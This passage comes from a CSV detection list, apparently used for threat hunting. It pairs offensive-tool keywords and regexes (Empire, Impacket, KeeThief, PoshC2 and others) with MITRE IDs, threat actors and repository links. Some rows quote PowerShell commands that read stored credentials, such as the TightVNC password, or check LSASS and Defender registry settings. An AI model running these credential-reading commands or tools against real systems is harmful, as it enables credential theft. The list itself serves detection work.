- TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46043" "*Get-GPPPassword.ps1*",".{0,1000}Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","46044" "*Get-GPPPassword.ps1*",".{0,1000}Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte 
- BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46045" "*Get-GPPPassword.py*",".{0,1000}Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46046" "*Get-GPPPasswords*",".{0,1000}Get\-GPPPasswords.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46047" "*Get-GraphTokens*",".{0,1000}Get\-GraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A 
Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Authenticate as a user to Microsoft Graph","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46048" "*Get-GroupMembers -GroupName ""Account Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Account\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46049" "*Get-GroupMembers -GroupName ""Domain Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Domain\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46050" "*Get-GroupMembers -GroupName ""Enterprise Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Enterprise\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46051" "*Get-GroupMembers -GroupName ""Server Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Server\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46052" "*Get-HeadersWithPrtCookies*",".{0,1000}Get\-HeadersWithPrtCookies.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 - TA0009 - TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46053" "*GetHijackableDllName*",".{0,1000}GetHijackableDllName.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","46054" "*getHostnameFromCVARS(*",".{0,1000}getHostnameFromCVARS\(.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#content","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","46055" "*Get-ImageNtHeaders*",".{0,1000}Get\-ImageNtHeaders.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 
- HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46056" "*get-implantworkingdirectory*",".{0,1000}get\-implantworkingdirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46057" "*Get-InactiveDomainAdmins*",".{0,1000}Get\-InactiveDomainAdmins.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","46058" "*Get-IndexedItem.ps1*",".{0,1000}Get\-IndexedItem\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - 
T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46059" "*Get-Information_exfil.ps1*",".{0,1000}Get\-Information_exfil\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","46060" "*Get-InstalledAV *",".{0,1000}Get\-InstalledAV\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","46061" "*Get-InternetExplorerBookmarks*",".{0,1000}Get\-InternetExplorerBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46062" 
"*Get-InternetExplorerHistory*",".{0,1000}Get\-InternetExplorerHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46063" "*Get-Item -Path ""HKLM:\SOFTWARE\Microsoft\Windows 
Defender\Exclusions\Paths*",".{0,1000}Get\-Item\s\-Path\s\""HKLM\:\\SOFTWARE\\Microsoft\\Windows\sDefender\\Exclusions\\Paths.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#registry","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46064" "*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\Software\\TightVNC\\Server\s\-Name\s.{0,1000}Password.{0,1000}\s\|\sselect\s\-ExpandProperty\sPassword.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#registry","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46065" "*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\-Name\s.{0,1000}RunAsPPL.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). 
You can query this with PowerShell as follows.","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Discovery","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#registry","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46066" "*GetKcpPasswordInfo*",".{0,1000}GetKcpPasswordInfo.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46067" "*Get-KeePassconfig*",".{0,1000}Get\-KeePassconfig.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46068" "*Get-KeePassConfigTrigger *",".{0,1000}Get\-KeePassConfigTrigger\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46069" 
"*Get-KeePassConfigTrigger*",".{0,1000}Get\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46070" "*Get-KeePassDatabaseKey *",".{0,1000}Get\-KeePassDatabaseKey\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46071" "*Get-KeePassDatabaseKey *",".{0,1000}Get\-KeePassDatabaseKey\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","46072" "*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS.
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46073" "*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46074" 
"*Get-KeePassINIFields*",".{0,1000}Get\-KeePassINIFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - 